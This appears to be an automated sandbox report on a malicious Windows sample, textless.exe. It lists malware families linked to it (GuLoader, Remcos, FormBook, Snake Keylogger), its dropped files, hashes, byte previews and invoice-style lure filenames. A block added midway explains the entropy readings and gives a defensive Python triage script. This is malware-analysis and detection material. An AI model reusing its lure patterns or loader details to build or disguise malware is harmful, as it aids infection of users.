Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1633447
Start date and time: 2025-03-10 11:22:22 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 58s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: textless.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@9/25@2/3
EGA Information:
• Successful, ratio: 60%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 89
• Number of non-executed functions: 276
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 2.16.185.191, 20.109.210.53, 52.149.20.212
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, e16604.f.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, c.pki.goog, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target 0ogHncCUa.exe, PID 5556 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 6504 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
06:23:20 | API Interceptor | 37x Sleep call for process: powershell.exe modified
06:23:51 | API Interceptor | 2x Sleep call for process: svchost.exe modified
                                                                        No context
                                                                        No context
                                                                        No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19N4533DWG.exe | malicious | FormBook | 216.58.212.142, 142.250.185.97
Commercial invoice and dhl awb tracking details.vbs | malicious | Remcos, GuLoader | 216.58.212.142, 142.250.185.97
CO894GOV2O25.vbs | malicious | Remcos, GuLoader | 216.58.212.142, 142.250.185.97
RFQ_25-03010#U00b7pdf.vbs | malicious | Remcos, GuLoader | 216.58.212.142, 142.250.185.97
DIR-A_JY4878249#U00b7pdf.vbs | malicious | Remcos, GuLoader | 216.58.212.142, 142.250.185.97
REQ DAMMAM HO PROJECT.exe | malicious | GuLoader | 216.58.212.142, 142.250.185.97
Salary List_pdf.bat.exe | malicious | GuLoader | 216.58.212.142, 142.250.185.97
REQ DAMMAM HO PROJECT.exe | malicious | GuLoader | 216.58.212.142, 142.250.185.97
URGENTE Ref.exe | malicious | GuLoader, Snake Keylogger | 216.58.212.142, 142.250.185.97
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\nss21DC.tmp\nsExec.dll | URGENTE Ref.exe | malicious | GuLoader, Snake Keylogger
C:\Users\user\AppData\Local\Temp\nss21DC.tmp\nsExec.dll | lkETeneRL3.exe | malicious | Snake Keylogger, VIP Keylogger
C:\Users\user\AppData\Local\Temp\nss21DC.tmp\nsExec.dll | Hornswoggle.exe | malicious | GuLoader
C:\Users\user\AppData\Local\Temp\nss21DC.tmp\nsExec.dll | Hornswoggle.exe | malicious | GuLoader
C:\Users\user\AppData\Local\Temp\nss21DC.tmp\nsExec.dll | Overheaped237.exe | malicious | GuLoader, Snake Keylogger
C:\Users\user\AppData\Local\Temp\nss21DC.tmp\nsExec.dll | 66776676676.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger
C:\Users\user\AppData\Local\Temp\nss21DC.tmp\nsExec.dll | anziOUzZJs.exe | malicious | Remcos
C:\Users\user\AppData\Local\Temp\nss21DC.tmp\nsExec.dll | SecuriteInfo.com.Program.Unwanted.1283.21599.30651.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\nss21DC.tmp\nsExec.dll | PTFE Coated Butterfly Valve Picture#U00b7pdf.exe | malicious | GuLoader, Lokibot
C:\Users\user\AppData\Local\Temp\nss21DC.tmp\nsExec.dll | cuenta iban-ES65.exe | malicious | FormBook, GuLoader
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1310720
                                                                                            Entropy (8bit):0.7066991545728124
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6VqY:2JIB/wUKUKQncEmYRTwh0U
                                                                                            MD5:69744EB1CD0B9B728B090BEDEE8BAADE
                                                                                            SHA1:00095F4911A245292F836D7448F14AB736541001
                                                                                            SHA-256:B59D5DA0A3B8FCF8358F3C7D3F1F5B575649CDDEE85030A126BAC62FDEA92592
                                                                                            SHA-512:5E7D5FEC4529A7AB3679C7AD94E00E3FEBCF8A2EF38A53A3081C311CE9842717AB3F422DC521DD5B7D26D481F61B1D06F22429FBD448F92446B48FA6E276B9E4
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x10929ea7, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                            Category:dropped
                                                                                            Size (bytes):1310720
                                                                                            Entropy (8bit):0.789988174585782
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:7SB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:7azaPvgurTd42UgSii
                                                                                            MD5:6C1E8DAE7E7348B1479EFCC663B51B9A
                                                                                            SHA1:DA15D64155FF726CDD42BD4D760A699E8299C06B
                                                                                            SHA-256:DCBFAC28423AD9FD720F0B6BF7B7972EE31EF4B9B69AB3C69E420F335347D947
                                                                                            SHA-512:E1FE1820727BE4FA06EE3719BD885D754D5A283C77EB9D9DA710C8D28998430F26A71EBC3D2E97BA404F2AA5A6AC414D9154C9A14E02890F1CC4448858F59071
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:....... ...............X\...;...{......................0.`.....42...{5.3....}s.h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{.....................................y3....}......................3....}s..........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):16384
                                                                                            Entropy (8bit):0.08130215765453098
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:7Sl8Yeh8+YoRXyqt/57Dek3J0glvmrllYllEqW3l/TjzzQ/t:G6zhmMbR3t0Nxemd8/
                                                                                            MD5:42A63AB806F1BFB39F2588E4300B2783
                                                                                            SHA1:E1A3C26E10C49D4F0D2BF02EF86669F24FBB0BB1
                                                                                            SHA-256:8ECB182B630BA45FFB0B2D3C7447A99ACD554F1ED350B2EE66031C21A83FF443
                                                                                            SHA-512:AEC39C77E0986E61CFEFB588AF5AB9533F9211CCFA3B13597069FA47E515A0B7E3F5B54B46D56E05AC75A5D9F77C54DCE4650DF2FDC95E8102A798D1CA7C2FBE
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:z........................................;...{..3....}s.42...{5.........42...{5.42...{5...Y.42...{59....................3....}s.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:modified
                                                                                            Size (bytes):53158
                                                                                            Entropy (8bit):5.062687652912555
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                                            MD5:5D430F1344CE89737902AEC47C61C930
                                                                                            SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                                            SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                                            SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                                            Malicious:false
                                                                                            Reputation:moderate, very likely benign file
                                                                                            Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                            Category:dropped
                                                                                            Size (bytes):621676
                                                                                            Entropy (8bit):7.675891095317541
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:JowisraETWNMHwQsNNG14vkM46P/wyeqwvcinEFAKSN+qq/9lX97:Jow/ra8WKQlM14h46P/wAYSLqq/7X97
                                                                                            MD5:9E8270179F04D867463A09AF7EE36E32
                                                                                            SHA1:E32B5FF6D109B529112F35C8F639FBB1BB5F4986
                                                                                            SHA-256:CC357E0C0D1B4B0C9CDAAA2F7FD530C7FCEE6C62136462C1533D50971F97D976
                                                                                            SHA-512:8D6BC637FE29007211BD9CCCC84B64C5DBFCC9083CB9097E2427E32E2DE4D6D957928184717EE2B4FEBA9A75631D87747639DA74682C65E82922D715C1F627B7
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 24%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F..v...F...@...F.Rich..F.........................PE..L....c.W.................^..........+2.......p....@.......................................@.................................(t.......0..`............................................................................p...............................text....].......^.................. ..`.rdata..F....p.......b..............@..@.data................v..............@....ndata.......@...........................rsrc...`....0.......z..............@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):26
                                                                                            Entropy (8bit):3.95006375643621
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                            Malicious:true
                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Users\user\Desktop\textless.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):720580
                                                                                            Entropy (8bit):6.485505381740637
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:Rt6Wpll2EdfAaOlchxabYdELr4+9DPX4DEU0DkniIqYCm+kYdwxCSxmebTyiTKq6:/XiaOlYYsdELhUakSkYdoC8Lbary08M
                                                                                            MD5:BA5A3AD27F191F7A7A5B7898A62CDC37
                                                                                            SHA1:A95A46336A039B55348A75DCDB0D018FD9C8F044
                                                                                            SHA-256:A11D5E21AAF093C246AE39C29E0E46AE0CFA5B2724BDD1A14278C2236F9414C8
                                                                                            SHA-512:1996D66904E18D8E890065ED34E6C40D8F10795400EC62BB8A1E4AF13CEB4837B3E6F766B744895171A069ED85EA133F28DE7D60646BCB1593BC2C36FB4481FE
                                                                                            Malicious:false
                                                                                            Preview:@ ......,...................Z...........z.......@ ..........................................................................................................................................................................................................................................J...`...............j...............................................................................................................................@...............2.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Users\user\Desktop\textless.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):6656
                                                                                            Entropy (8bit):4.994861218233575
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:U7GUxNkO6GR0t9GKKr1Zd8NHYVVHp4dEeY3kRnHdMqqyVgNN3e:mXhHR0aTQN4gRHdMqJVgNE
                                                                                            MD5:B648C78981C02C434D6A04D4422A6198
                                                                                            SHA1:74D99EED1EAE76C7F43454C01CDB7030E5772FC2
                                                                                            SHA-256:3E3D516D4F28948A474704D5DC9907DBE39E3B3F98E7299F536337278C59C5C9
                                                                                            SHA-512:219C88C0EF9FD6E3BE34C56D8458443E695BADD27861D74C486143306A94B8318E6593BF4DA81421E88E4539B238557DD4FE1F5BEDF3ECEC59727917099E90D2
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: URGENTE Ref.exe, Detection: malicious
• Filename: lkETeneRL3.exe, Detection: malicious
• Filename: Hornswoggle.exe, Detection: malicious
• Filename: Hornswoggle.exe, Detection: malicious
• Filename: Overheaped237.exe, Detection: malicious
• Filename: 66776676676.exe, Detection: malicious
• Filename: anziOUzZJs.exe, Detection: malicious
• Filename: SecuriteInfo.com.Program.Unwanted.1283.21599.30651.exe, Detection: malicious
• Filename: PTFE Coated Butterfly Valve Picture#U00b7pdf.exe, Detection: malicious
• Filename: cuenta iban-ES65.exe, Detection: malicious
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..7..7..7..7..7,..7..7..7..7..7..7Rich..7........PE..L...rc.W...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\Desktop\textless.exe
File Type:data
Category:dropped
Size (bytes):331022
Entropy (8bit):7.683787359121338
Encrypted:false
SSDEEP:6144:aWpll2EdfAaOlchxabYdELr4+9DPX4DEU0DkniIqYCm+kYdwx9:nXiaOlYYsdELhUakSkYdo9
MD5:2370D69B3C944CBF8951CA39D008A776
SHA1:F6C7E07735E02BBBA47EA03741841D8CD323464B
SHA-256:5B77E53961B38A309585CD1843DA47CFD102A03B029347A27F72666BE6C03AED
SHA-512:49571DCFDE3666AC91010437E03342433273800C70F207B8DE9968D63C455A8CCB711AA3D4209F0A95AC095BCA5430130ECEAEC2458494167A12FD4FADD8C7F4
Malicious:false
Preview:.......**..++........X...............//////.....33...~.........................d.d............::::.m..y................................,,..............9.{............. ......................zz...........H....................sssssssss....+..R.}...........3.................uuu.?.................................55555555555.................................777777..YY....ss....O..[..................................GG...ZZ.ll..........G....p.............ss... ..t..0................................0.......R.5........{...c......22.......~........R............l...W.........=.......e.uu............::..N............................ll..............G..........N.............nn.f......`.......}}. .....````............{...........v...kk................................5.........66.........a............[[[[[.......B................R..ggg......hh.......v.\.......................[[................f..ff.............................................oo..........ll............5...............................

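The per-file fields in these entries (size, 8-bit entropy, MD5/SHA-1/SHA-256, a magic-byte file type) are what an analyst recomputes when triaging dropped files offline. The block below is an added example, not code from Joe Sandbox or from the sample: it reproduces those fields over constructed stand-in blobs and layers a packing verdict on top. The 7.5 bit/byte cut-off is an assumption of this example, not the sandbox's own "Encrypted" rule; the point it makes is that entropy must be read together with file type, since the report's JPEGs legitimately sit near 7.96 while the 7.68 of an untyped "data" blob dropped by the loader is the number worth a second look.

```python
import hashlib
import math
from collections import Counter

# Constructed stand-ins for dropped files (NOT the bytes of the files listed above):
# a PE-like blob, a JFIF-like blob, junk word salad, and a sparse binary.
SAMPLES = {
    "fake_pe.bin": b"MZ\x90\x00" + b"This program cannot be run in DOS mode." + bytes(range(256)) * 4,
    "fake_jpeg.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01" + bytes(range(256)) * 2,
    "junk_words.txt": b"Concomitant trip wedgeable rooibok hemateins nudlers asparagic\r\n",
    "sparse_data.bin": b"\x00" * 4000 + b"y" * 200,
}

# Assumed triage cut-off; Joe Sandbox's own "Encrypted" heuristic is not documented on this page.
PACKED_THRESHOLD = 7.5


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for a constant stream, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def sniff_type(data: bytes) -> str:
    """Minimal magic-byte check standing in for the report's 'File Type' column."""
    if data[:2] == b"MZ":
        return "PE executable (MZ header)"
    if data[:3] == b"\xff\xd8\xff" and data[6:10] == b"JFIF":
        return "JPEG image (JFIF)"
    if data and all(b in b"\r\n\t" or 0x20 <= b < 0x7F for b in data):
        return "ASCII text"
    return "data"


def describe(name: str, data: bytes) -> dict:
    """Emit the same fields as one report entry plus a packing verdict.
    Compressed formats are expected to be high-entropy, so only executables
    and untyped 'data' blobs are flagged when they cross the threshold."""
    kind = sniff_type(data)
    ent = shannon_entropy(data)
    return {
        "name": name,
        "type": kind,
        "size": len(data),
        "entropy": round(ent, 4),
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "likely_packed": ent >= PACKED_THRESHOLD
        and kind in ("PE executable (MZ header)", "data"),
    }


def triage(samples: dict) -> list:
    """Run describe() over every sample, in insertion order."""
    return [describe(name, data) for name, data in samples.items()]


if __name__ == "__main__":
    for entry in triage(SAMPLES):
        print(entry)
```

Against the constructed set only the PE-like blob is flagged: the JFIF blob has comparable entropy but is excluded by type, and the sparse binary and the word-salad text fall well under the threshold. On real dropped files the same logic would pass over the JPEGs and the text files in this report and single out the high-entropy "data" and MZ drops for unpacking.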
Process:C:\Users\user\Desktop\textless.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):233
Entropy (8bit):4.218275149059182
Encrypted:false
SSDEEP:6:5qlvVqDqHfspV6rvAYEOElcTgWNKnX4iEda:5q32pYNEO5mnX4nk
MD5:C3DFE131F54C74B2E7B579D1DFD08F6D
SHA1:5AE446BC9D0C1997D20987F8660AE5C7ABC1712D
SHA-256:35370D35DCD5D967D9517571DAB47B3BF8F34E0B385E9C57A22579CBE7BA1ACC
SHA-512:6E5461A9CF59E1384C41B34EDAC861983C2344BD4C90314579C87D0AEA8AE56D4B4707537074A1E7BE4E09506A1AF148E03330A0CAC272306158173DD0E10E3D
Malicious:false
Preview:..........Concomitant forngtelsernes trip straffefaststtelsernes wedgeable rooibok gutturonasal hemateins blrehalskirtel nudlers asparagic..Healthiest besttelsestidernes neuratrophia potlikker fodtudser stenkulsnaftaens moncassin....

Process:C:\Users\user\Desktop\textless.exe
File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 223x403, components 3
Category:dropped
Size (bytes):17860
Entropy (8bit):7.963376709350411
Encrypted:false
SSDEEP:384:l6uCVuoDLjmXdXKqqjQ/Edx4jPQJs0RCWQBJrlhP54iEEVP48lt8Z2SDu:l63zMXKqTcdCPQJtRCBBtlhBdBVPF0Zi
MD5:A8DA0E9EA106CAE32FB695A6358C54B9
SHA1:73C3A9DE5CA3DFD506A25987E04107C2F96D1DEB
SHA-256:139F8AEAAE1BB1B8E5691FC1040BD508D01B4E322BFAD7DC4B77E79F78FADE86
SHA-512:CABF69FA7C1DC06D4682130746F656FE7926B0ACCB823EE8B8071A957883F6CC4EBF310147E6FD6FAB10E1DDF0F0730A45AABDBF90B74582A929FD39427B87CD
Malicious:false
Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..V.V<!......5..|K..S.}+U.9.)...8...n...r..b...:R..$pz.W...CD`.z...X.'...#.S...C/4...6.nq..L....SF.EEwx..T...>b}......Z`..z}.I.e-.*O+l.?w....D.v...j..Yr:f.%.....n...H.tYf9T.OZ...J.(..zc.PrEU.\....P...ST.%..O]...&f.cJ_...U.I..g./...G;W9&..Jv/n..G!......f..8'<.j.j.d.....*......".f5......X...q..$..V|...}*.FROr..(y<..MBEV@.!...4C.z...............c<.9'.M1.....OC..$

Process:C:\Users\user\Desktop\textless.exe
File Type:data
Category:dropped
Size (bytes):58928
Entropy (8bit):1.2626939660154362
Encrypted:false
SSDEEP:768:pcAfk+AnbgQe+kPrlVrzlhdL6jx11ouGwM/8:59Nkv
MD5:6535DEC4BB3F4914D6A60901948B358B
SHA1:273D708F01C72B4BC4C6D36C4484524AE2A37F4B
SHA-256:68CD4323973D5277998D8B60B3C987577B010CA6F8D3ADE7A3E7D1231F8F0553
SHA-512:6C1749CCBFE7760EAC9F3A6BF3EE5C5A045A7CBEDC2B2EC237AD3CF85657769BEDBC41EDB56D44261404535405AEDD0AF2C3DC450675A9F2A1D29D78DD616647
Malicious:false
Preview:.3..............:.......U.....................................V....i.......................Y........................'............................8.............................................................+...........n..........H.................................................Y....@............................................................c..'.................."............................N.........................t......................S.....................5.....Q.....................................h....................N..................................[........................................................................F..........................&............................................................/.......................................................a....2....N........................................]........................K.............................X.................................2...........?...................................*..................B.......

Process:C:\Users\user\Desktop\textless.exe
File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 494x14, components 3
Category:dropped
Size (bytes):2176
Entropy (8bit):7.5992816081270815
Encrypted:false
SSDEEP:48:D9YMOuERAOlmjUk4ndU2/AlwlfTz8M8VMIlVKBKu6uLFH+:RhREphu2tlKHlG36uZe
MD5:BDA63CF861821105FE9B4300C8E8F25B
SHA1:3AAB8B61C8BE65D854CE55441B26622966FE98F8
SHA-256:E79E64130443631CDD1DBBFB8C6B8427317781A3C50CA17D10A6C14027A82EEB
SHA-512:BABC1FBA905052303A9476ADDD92F8FED88E334199E307AD547304E17708B9824AE1FFC91DCC6C6DE10976D841ABA946E28B5D6D0BDD4DAB102AE73594975943
Malicious:false
Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...#.X............j........H>...S.......!........u.\.g...5....................7._..]r...?.1....]...C.(.]...........<G..iG.t...?.^b|q.f......._...........:......O.._....t.....$>'...j.......A.?.....o.v.W..1..(..!.....I...~..j..O.......!.5.9..#.............J.......R..a.....Z.D....?..?.J5}@t....C.4s......N....?..8h...O.Dkz...r?...8x.W.5......G<{.,

Process:C:\Users\user\Desktop\textless.exe
File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 789x302, components 3
Category:dropped
Size (bytes):30202
Entropy (8bit):7.96328907923243
Encrypted:false
SSDEEP:768:fA6owDYF36Pe9nBJSuz3DWwp0I1lkTgU2DbYyp2F:fA6oiYB6PwBouzT8IITXI5p2F
MD5:E764FB01E297D91C48E29D363277EFC0
SHA1:60549A56341278224B647E7B831EBE1206FAE804
SHA-256:6026318F3F4BEBE143472FD97D8547AAE293EE7926F0BD5AC4D0FF984A597636
SHA-512:94B5E5CD9748826061BE70F4B46A3E6CA79F6AC4872E90317DEA10F832AA0A8475465077D586A20DD7A817F6E0FC45C153092909797DAE8DD76FAB64C1C81BC4
Malicious:false
